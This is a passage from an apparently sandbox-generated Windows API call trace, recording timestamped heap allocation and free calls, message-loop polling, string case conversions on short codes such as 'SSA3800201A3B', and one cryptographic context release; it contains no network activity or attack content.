dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.713] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.713] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0206.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.714] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.714] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.714] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.715] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.715] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.715] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.716] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.716] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0206.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0206.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0206.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0206.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.723] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.723] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0206.723] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.723] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.724] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.724] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.724] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.724] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0206.724] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.724] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.725] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.725] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.725] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.725] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.725] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.726] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.726] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.726] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.726] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0206.726] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.726] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.726] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, 